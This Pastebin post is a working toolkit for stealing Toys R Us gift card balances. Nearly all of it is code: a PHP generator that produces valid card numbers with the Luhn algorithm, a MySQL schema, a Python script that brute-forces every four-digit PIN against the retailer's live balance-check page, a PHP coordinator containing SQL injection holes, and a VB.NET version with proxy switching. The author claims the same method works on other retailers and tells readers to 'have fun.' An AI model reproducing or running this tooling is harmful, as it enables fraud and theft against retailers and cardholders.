Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Well my 1337 hacker community hackforums.net wouldn't let me post this :'(.
- Posting this cause' Toys R Us needs to fix their security. I can't contact them directly, so I'll let you guys handle that.
- Security on the Internet needs to be taken seriously now-a-days. I'd recommend corporations having a system for these kind of things like Google and Facebook have. But first start off with a captcha. I'm not talking about the text captcha Stables and Home Depot. I'm talking about those nice captchas that this site has for example. Although, that doesn't even work as there are services out there that offer a captcha by-pass and when you're paying $2 for 1000 completed captchas, well hitting a $100 gift card does make up for that.
- Same method applies to Victoria Secret and Nordstrom too ;).
- ----------------------------------------------------------------------------------------------
- Toys R Us gift cards go by the luth algo.
- Gift Card #: 6276687308393584
- Pin #: 0236
- If you check gift card # with luth validator: validcreditcardnumber.com
- It comes back with a green check.
- Now. We delete one number "4" (627668730839358). Check with: planetcalc.com/2464/
- They say the next digit is "4". Now we can print out some numbers.
- <?php
- function Luhn($number, $iterations)
- {
- while ($iterations-- >= 1)
- {
- $stack = 0;
- $number = str_split(strrev($number), 1);
- foreach ($number as $key => $value)
- {
- if ($key % 2 == 0)
- {
- $value = array_sum(str_split($value * 2, 1));
- }
- $stack += $value;
- }
- $stack %= 10;
- if ($stack != 0)
- {
- $stack -= 10;
- }
- $number = implode('', array_reverse($number)) . abs($stack);
- }
- return $number;
- }
- $orgin = "627668730839";
- $last = "358";
- ?>
- INSERT INTO `cards` (`card_number`, `pin_number`, `success`, `proccessing`, `current_pin`, `balance`) VALUES
- <?php
- for ($x = 0; $x <= 40; $x++) {
- echo "('" . Luhn($orgin . $last, 1) . "', '0', 0, 0, '0', '')," . "</br>";
- $last -= 1;
- }
- ?>
- Now we have numbers and a database.
- CREATE TABLE `cards` (
- `id` int(11) NOT NULL,
- `card_number` varchar(255) NOT NULL,
- `pin_number` varchar(11) NOT NULL,
- `success` int(11) NOT NULL,
- `proccessing` int(11) NOT NULL,
- `current_pin` varchar(11) NOT NULL,
- `balance` varchar(255) NOT NULL
- ) ENGINE=MyISAM DEFAULT CHARSET=latin1;
- And now we have a Pyton script that pulls from the DB and begins checking.
- from bs4 import BeautifulSoup
- import re
- import urllib.request, urllib, json, time, atexit, sys
- import http
- import io
- import csv
- import os
- from random import randint
- def process_card(card, pin):
- headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36", 'Referer': 'https://www.toysrus.com/checkout/checkAccountBalance.jsp', "Content-Type":'application/x-www-form-urlencoded'}
- cj = http.cookiejar.CookieJar()
- req = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
- req.addheaders = list(headers.items())
- req.open("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
- # The data should be URL-encoded and then encoded using UTF-8 for best compatilibity
- data = urllib.parse.urlencode({"step": "giftcardBalance", "accountNumber": str(card), "pin": str(pin)}).encode("UTF-8")
- res = req.open("https://www.toysrus.com/coreg/index.jsp", data)
- parse_page = BeautifulSoup(res.read(), "lxml")
- grab_result = str(parse_page.findAll("div", { "class" : "instructions" }))
- if "Error processing, please try again later" in grab_result:
- amount = "fail"
- elif "This reflects your" in grab_result:
- amount = re.findall(r'([£$€])(\d+(?:\.\d{2})?)', grab_result)
- else:
- print("Error Handle Alert")
- f = open("error_" + str(int(time.time())) + ".html", "wb")
- content = res.read()
- f.write(content)
- f.close()
- exit_handler()
- return amount
- card_number = None
- pin_number = None
- def main():
- global card_number
- global pin_number
- card_number = urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?grab=yea")).read()
- if "|" in str(card_number):
- card_number_split = str(card_number.strip().decode("utf-8")).split("|")
- card_number = str(card_number_split[0])
- pin_number = str(card_number_split[1])
- else:
- card_number = str(card_number.strip().decode("utf-8"))
- if card_number is "":
- exit_handler()
- request_processing = urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" + card_number)).read()
- if request_processing is None:
- exit_handler()
- else:
- print("[STARTING]")
- if pin_number is None:
- range_set = 0
- else:
- range_set = int(pin_number)
- for i in range(range_set, 9999):
- pin = '{0:04}'.format(i)
- process = process_card(card_number, pin)
- if "fail" not in process:
- urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&success=yea&card=" + card_number + "&pin=" + pin + "&balance=" + process[0][1]))
- print("Success:", process[0][1])
- exit()
- else:
- print("Failed:", card_number, pin)
- urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" + card_number + "&pin=" + pin))
- def exit_handler():
- global card_number
- urllib.request.urlopen(urllib.request.Request("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=na&card=" + card_number))
- try:
- sys.exit(0)
- except SystemExit:
- os._exit(0)
- if __name__=='__main__':
- try:
- main()
- except KeyboardInterrupt:
- exit_handler()
- except Exception as e:
- exit_handler()
- atexit.register(exit_handler)
- All of a sudden we have the other PHP file.
- <?php
- // organizer.php
- $servername = "localhost";
- $username = "DB USERNSME";
- $password = "DB PASSWORD";
- $dbname = "DB NAME";
- $grab = $_GET['grab'];
- $update = $_GET['update'];
- $pin = $_GET['pin'];
- $card = $_GET['card'];
- $success = $_GET['success'];
- $proccessing = $_GET['proccessing'];
- $balance = $_GET['balance'];
- if(isset($grab) == "yea") {
- // Create connection
- $conn = new mysqli($servername, $username, $password, $dbname);
- // Check connection
- if ($conn->connect_error) {
- die("Connection failed: " . $conn->connect_error);
- }
- $sql = "SELECT * FROM cards ORDER BY RAND()";
- $result = $conn->query($sql);
- if ($result->num_rows > 0) {
- while($row = $result->fetch_assoc()) {
- if($row['proccessing'] == 0 && $row['success'] == 0) {
- if($row['current_pin'] == 0) {
- echo $row['card_number'];
- break;
- } else {
- echo $row['card_number'] . "|" . $row['current_pin'];
- break;
- }
- }
- }
- } else {
- echo "Fail";
- }
- $conn->close();
- }
- if(isset($update) == "yea" && isset($success) == "yea" && isset($card) && isset($pin) && isset($balance)) {
- // Create connection
- $conn = new mysqli($servername, $username, $password, $dbname);
- // Check connection
- if ($conn->connect_error) {
- die("Connection failed: " . $conn->connect_error);
- }
- $sql = "UPDATE cards SET pin_number='" . $pin . "', balance='" . $balance . "', success='1' WHERE card_number='" . $card . "';";
- $result = $conn->query($sql);
- if (!$result) {
- echo "Fail";
- }
- $conn->close();
- }
- if(isset($update) == "yea" && isset($proccessing) == "yea" && isset($card)) {
- // Create connection
- $conn = new mysqli($servername, $username, $password, $dbname);
- // Check connection
- if ($conn->connect_error) {
- die("Connection failed: " . $conn->connect_error);
- }
- $sql = "UPDATE cards SET proccessing='1' WHERE card_number='" . $card . "';";
- $result = $conn->query($sql);
- if (!$result) {
- echo "Fail";
- }
- $conn->close();
- }
- if(isset($update) == "yea" && isset($proccessing) && $proccessing == "na" && isset($card)) {
- // Create connection
- $conn = new mysqli($servername, $username, $password, $dbname);
- // Check connection
- if ($conn->connect_error) {
- die("Connection failed: " . $conn->connect_error);
- }
- $sql = "UPDATE cards SET proccessing='0' WHERE card_number='" . $card . "';";
- $result = $conn->query($sql);
- if (!$result) {
- echo "Fail";
- }
- $conn->close();
- }
- if(isset($update) == "yea" && isset($proccessing) == "yea" && isset($card) && isset($pin)) {
- // Create connection
- $conn = new mysqli($servername, $username, $password, $dbname);
- // Check connection
- if ($conn->connect_error) {
- die("Connection failed: " . $conn->connect_error);
- }
- $sql = "UPDATE cards SET current_pin='" . $pin . "' WHERE card_number='" . $card . "';";
- $result = $conn->query($sql);
- if (!$result) {
- echo "Fail";
- }
- $conn->close();
- }
- ?>
- You can figure out how to piece it together. But once up n' running, have fun.
- VB.NET version:
- Imports System.IO
- Imports System.Net
- Public Class Form1
- Dim Begin As Boolean = False
- Dim pin As String
- Dim card As String
- Private Function RemoveInvalidFileNameChars(UserInput As String) As String
- For Each invalidChar In IO.Path.GetInvalidFileNameChars
- UserInput = UserInput.Replace(invalidChar, "")
- Next
- Return UserInput
- End Function
- Private Function GetBetween(ByVal sSearch As String, ByVal sStart As String, ByVal sStop As String, Optional ByVal lSearch As Integer = 1) As String
- Dim lTemp As Long
- lSearch = InStr(lSearch, sSearch, sStart)
- If lSearch > 0 Then
- lSearch = lSearch + Len(sStart)
- lTemp = InStr(lSearch, sSearch, sStop)
- If lTemp > lSearch Then Return Trim(Mid$(sSearch, lSearch, lTemp - lSearch))
- End If
- Return vbNullString
- End Function
- Private Sub Button2_Click(sender As Object, e As EventArgs)
- NumericUpDown2.Value = TextBox1.Text
- WebBrowser1.Navigate("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
- Begin = True
- End Sub
- Public Function Proccess() As String
- Begin = False
- If WebBrowser1.DocumentText.Contains("Error processing") Then
- Dim webClient As New System.Net.WebClient
- webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" & TextBox3.Text & "&pin=" & TextBox1.Text)
- NumericUpDown2.Value += 1
- ElseIf WebBrowser1.DocumentText.Contains("This reflects your Toys R Us Gift Card Balance") Then
- Dim webClient As New System.Net.WebClient
- Dim balance As String = GetBetween(WebBrowser1.DocumentText, "<div class=""instructions"">", "</div>")
- Dim balance_ As String() = RemoveInvalidFileNameChars(balance).Split("$")
- webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&success=yea&card=" & TextBox3.Text & "&pin=" & TextBox1.Text & "&balance=" & balance_(1))
- 'MessageBox.Show("Success! PIN: " & TextBox1.Text)
- 'WebBrowser1.Navigate("javascript:document.newcard.submit()")
- Me.Close()
- ElseIf WebBrowser1.Document.GetElementById("pin") Is Nothing Then
- Timer1.Enabled = True
- Timer1.Start()
- End If
- If Not WebBrowser1.Document.GetElementById("accountNumber") Is Nothing Then
- WebBrowser1.Document.GetElementById("accountNumber").SetAttribute("value", TextBox3.Text)
- WebBrowser1.Document.GetElementById("pin").SetAttribute("value", TextBox1.Text.ToString)
- WebBrowser1.Document.GetElementById("checkAccountBtn").Focus()
- WebBrowser1.Document.GetElementById("checkAccountBtn").InvokeMember("click")
- End If
- End Function
- Private Sub WebBrowser1_DocumentCompleted(sender As Object, e As WebBrowserDocumentCompletedEventArgs) Handles WebBrowser1.DocumentCompleted
- Proccess()
- End Sub
- Private Sub NumericUpDown2_ValueChanged(sender As Object, e As EventArgs) Handles NumericUpDown2.ValueChanged
- If NumericUpDown2.Value < 10 Then
- TextBox1.Text = "000" & NumericUpDown2.Value
- ElseIf NumericUpDown2.Value < 100 Then
- TextBox1.Text = "00" & NumericUpDown2.Value
- ElseIf NumericUpDown2.Value < 1000 Then
- TextBox1.Text = "0" & NumericUpDown2.Value
- ElseIf NumericUpDown2.Value < 1000 Then
- TextBox1.Text = NumericUpDown2.Value
- Else
- TextBox1.Text = NumericUpDown2.Value
- End If
- End Sub
- Private Sub Form1_FormClosing(sender As Object, e As FormClosingEventArgs) Handles Me.FormClosing
- Dim webClient As New System.Net.WebClient
- webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=na&card=" & card)
- End Sub
- Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
- If TextBox1.Text = TextBox2.Text Then
- Me.Close()
- End If
- ProgressBar1.Value += 1
- If ProgressBar1.Value = ProgressBar1.Maximum Then
- WebBrowser1.Navigate("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
- Timer1.Enabled = False
- Timer1.Stop()
- ProgressBar1.Value = 0
- End If
- End Sub
- ' The structure we use for the information
- ' to be interpreted correctly by API.
- Public Structure Struct_INTERNET_PROXY_INFO
- Public dwAccessType As Integer
- Public proxy As IntPtr
- Public proxyBypass As IntPtr
- End Structure
- ' The Windows API function that allows us to manipulate
- ' IE settings programmatically.
- Private Declare Auto Function InternetSetOption Lib "wininet.dll" _
- (ByVal hInternet As IntPtr, ByVal dwOption As Integer, ByVal lpBuffer As IntPtr,
- ByVal lpdwBufferLength As Integer) As Boolean
- ' The function we will be using to set the proxy settings.
- Private Sub RefreshIESettings(ByVal strProxy As String)
- Const INTERNET_OPTION_PROXY As Integer = 38
- Const INTERNET_OPEN_TYPE_PROXY As Integer = 3
- Dim struct_IPI As Struct_INTERNET_PROXY_INFO
- ' Filling in structure
- struct_IPI.dwAccessType = INTERNET_OPEN_TYPE_PROXY
- struct_IPI.proxy = System.Runtime.InteropServices.Marshal.StringToHGlobalAnsi(strProxy)
- struct_IPI.proxyBypass = System.Runtime.InteropServices.Marshal.StringToHGlobalAnsi("local")
- ' Allocating memory
- Dim intptrStruct As IntPtr = System.Runtime.InteropServices.Marshal.AllocCoTaskMem(System.Runtime.InteropServices.Marshal.SizeOf(struct_IPI))
- ' Converting structure to IntPtr
- System.Runtime.InteropServices.Marshal.StructureToPtr(struct_IPI, intptrStruct, True)
- Dim iReturn As Boolean = InternetSetOption(IntPtr.Zero, INTERNET_OPTION_PROXY, intptrStruct, System.Runtime.InteropServices.Marshal.SizeOf(struct_IPI))
- End Sub
- Private Sub Form1_Load(sender As Object, e As EventArgs) Handles Me.Load
- Dim webClient As New System.Net.WebClient
- Dim result As String = webClient.DownloadString("http://127.0.0.1/gift/organizer.php?grab=yea")
- If result.Contains("|") Then
- Dim split As String() = result.Split("|")
- card = split(0)
- pin = split(1)
- NumericUpDown2.Value = pin
- TextBox1.Text = pin
- TextBox3.Text = card
- Else
- card = result
- TextBox3.Text = result
- NumericUpDown2.Value = TextBox1.Text
- End If
- webClient.DownloadString("http://127.0.0.1/gift/organizer.php?update=yea&proccessing=yea&card=" & card)
- WebBrowser1.Navigate("https://www.toysrus.com/checkout/checkAccountBalance.jsp")
- Begin = True
- End Sub
- End Class
Add Comment
Please, Sign In to add comment